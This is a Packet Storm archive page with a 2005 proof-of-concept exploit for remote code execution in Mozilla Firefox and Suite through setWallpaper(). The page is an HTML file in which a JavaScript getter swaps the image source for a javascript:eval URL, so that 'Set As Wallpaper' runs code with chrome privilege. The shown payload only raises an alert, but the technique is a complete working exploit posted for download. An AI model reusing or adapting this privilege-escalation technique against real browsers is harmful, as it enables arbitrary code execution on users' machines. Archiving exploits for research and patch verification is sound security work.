exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mfsa2005-55exploit.txt

mfsa2005-55exploit.txt
Posted Jul 15, 2005
Authored by moz_bug_r_a4

Mozilla Firefox and Suite setWallpaper() remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | 27adbee5244e42797d153b572619c417e7592513f3f2a5ca0394d31818ab4535

mfsa2005-55exploit.txt

Change Mirror Download
// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image: url("http://www.mozilla.org/images/mozilla-16.png");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHWSURBVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9FwSJoRkAEEAM0DD4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrLmjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBia+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABNA3obAZXIAa6iKEcGlMVQHwWyjYuL2d4v2cPg8vZswx7gHyAA
AK7AOif7SAbOqCmn4Ha3AHFsIDtgPq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkgmQ7yKCZxpCQxqUZhAECCJ4XgMl493ug21ZD+aDAXH0WL
M4A9MZPXJkJIIAwTAR5pQMalaCABQUULttBGCCAGCnNzgABBgAMJ5THwGvJL
AAAAABJRU5ErkJggg==");
}
</style>
</head>

<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
<pre>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.

A dialog that shows Components.stack will appear.
</pre>

<IMG id="i"/>

<script>
<![CDATA[
var sx = navigator.productSub < 20050622 ? 2 : 4;

// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');

var u = [ "http://www.mozilla.org/images/mozilla-16.png",
"javascript:eval('" + evalCode + "')" ];

var sc = 0;
var i = document.getElementById("i");
i.addEventListener("contextmenu", function(e) { sc = 0; }, false);
i.__defineGetter__("src", function() {
//return (confirm(++sc)) ? u[0] : u[1];
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>

</body>
</html>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close